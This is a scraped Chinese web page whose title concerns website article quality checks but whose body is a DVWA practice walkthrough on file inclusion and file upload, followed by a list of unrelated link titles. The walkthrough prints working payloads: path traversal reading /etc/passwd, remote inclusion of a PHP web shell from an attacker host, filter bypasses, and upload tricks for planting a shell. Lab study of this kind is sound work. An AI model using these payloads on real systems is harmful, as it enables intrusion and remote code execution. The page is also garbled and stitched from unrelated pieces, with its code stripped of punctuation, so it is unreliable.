当前位置: 首页 > news >正文

网站文章质检哪些经营范围是包含网站开发的

news 2026/4/18 14:55:44
网站文章质检,哪些经营范围是包含网站开发的,wordpress主题the7中文汉化版,网站怎么做的qq邮件订阅文件包含 本地文件包含#xff08;敏感信息泄露#xff09;和远程文件包含#xff08;命令执行#xff09; 本地文件包含一般包含一些本地的敏感文件#xff0c;如#xff1a;/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行#xff0c;如包含黑客vps的…文件包含 本地文件包含敏感信息泄露和远程文件包含命令执行 本地文件包含一般包含一些本地的敏感文件如/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行如包含黑客vps的http://192.168.72.162:8000/shell.php文件而文件内容如下?php system(whoami)? 测试环境 本地文件包含不用什么测试环境只要有个文件就能知道其是否触发远程文件包含需要我们写个php代码如下 ?php echo this is the remote file.\n; system($_GET[a]); ? 然后python -m http.server 开个服务器让dvwa能包含我们的php代码 easy linux服务下的本地文件包含 ../../../../../../etc/passwd windows服务下的本地文件包含 我的php网站部署在F盘在F盘下放一个test.txt ​ ../../../../../../test.txt能将文件读出 或者直接绝对路径 ​ C:/Windows/system.ini 远程文件包含 http://www.oswe.com/dvwa/vulnerabilities/fi/?pagehttp://192.168.72.162:8000/shell.phpawhoami ​ 访问成功如下图 medium $file str_replace( array( http://, https:// ), , $file ); $file str_replace( array( ../, ..\\ ), , $file ); ​ 方法1 直接输入绝对路径 http://www.oswe.com/dvwa/vulnerabilities/fi/?pageF:/test.txt 正常输出 ​ 方法2双写绕过 http://www.oswe.com/dvwa/vulnerabilities/fi/?page ..././..././..././..././..././..././..././..././test.txt ​ http://www.oswe.com/dvwa/vulnerabilities/fi/?pagehthttp://tp://192.168.72.162:8000/shell.phpawhoami high if( !fnmatch( file*, $file ) $file ! include.php ) {// This isnt the page we want!echo ERROR: File not found!;exit; } ​ 上面的逻辑是如果参数没有file字符串且不是include.php直接过滤所以这个情况不能使用远程文件包含了 我们通过伪协议file bypass ​ pagefile:///C:/Windows/system.ini或 pagefile:///../../../../../../../../test.txt impossible if( $file ! include.php $file ! file1.php $file ! file2.php $file ! file3.php ) {// This isnt the page we want!echo ERROR: File not found!;exit; } ​ 后台只允许包含这4个文件 文件上传 文件上传只有medium、high、impossible三种难度 准备个php脚本 ?php system($_GET[a]); ? medium 检测请求头 ​ 抓包修改数据包直接过 Content-Type: image/jpeg high 检测后缀是否为jpg、jpeg、png ​ 上传 shell.php.jpg或shell.php.png都能被解析为php文件总感觉哪里很怪 impossible imagecreatefrompng imagecreatefromjpeg 由文件或url创建一个新图像如果解析图像失败会报错 ​ 上传的文件会成为md5值.png或md5值.jpg的形式web服务器不会将其解析为php文件
http://www.hkea.cn/news/14315816/

相关文章:

  • 给女友惊喜做网站简述网站开发的基本原则
  • 网站的ftp账号和密码是什么杭州智能模板建站
  • 执法局网站建设目的电脑商业网站怎的做
  • 深圳品牌网站建设网站设计方案公司
  • 微网站建设合同自助建站软件排行榜
  • 南宁网站建设设计网站添加微博
  • 全国建设建管中心网站网站开发流程人物
  • 什么叫做网站整站网站一直百度上搜不到是怎么回事啊
  • 人工做流量的网站北京网页制作电话
  • 网站app开发哪家好门户网站ip地址段
  • 做钓鱼网站要具备什么seo入门版
  • 现在做什么行业最赚钱最稳单页网站排名优化
  • 杭州做网站的公司哪些比较好网站建设前置审批
  • 学校网站管理与建设办法网站开发类app
  • 爱名网22自助网站建设网站建设中faqs的意思
  • 网站keywords重复解决方法范县网站建设公司
  • 平湖公司做网站网站建设hairongsoft
  • 查看网站被百度收录电影制作专业
  • 做商城网站怎么做网站用ps下拉效果怎么做
  • 企业网站托管电话网站建设需要备案吗
  • 苏州营销型网站开发公司七牛云wordpress图床
  • 网站服务器中如何做重定向漳州公司注册
  • 做爰xo的视频网站试看申请网站空间就是申请域名
  • 网站建设公司找客户网站怎么优化搜索
  • 怎么用易语言做网站网站开发需要多少费用
  • 房产智能建站系统装饰工程施工组织设计
  • 网站建设 手机网站发布外链
  • 站长之家论坛做啪啪网站
  • 黄岩建设局台州网站建设微信网站如何制作软件
  • 申请免费个人网站和域名加强网站的建设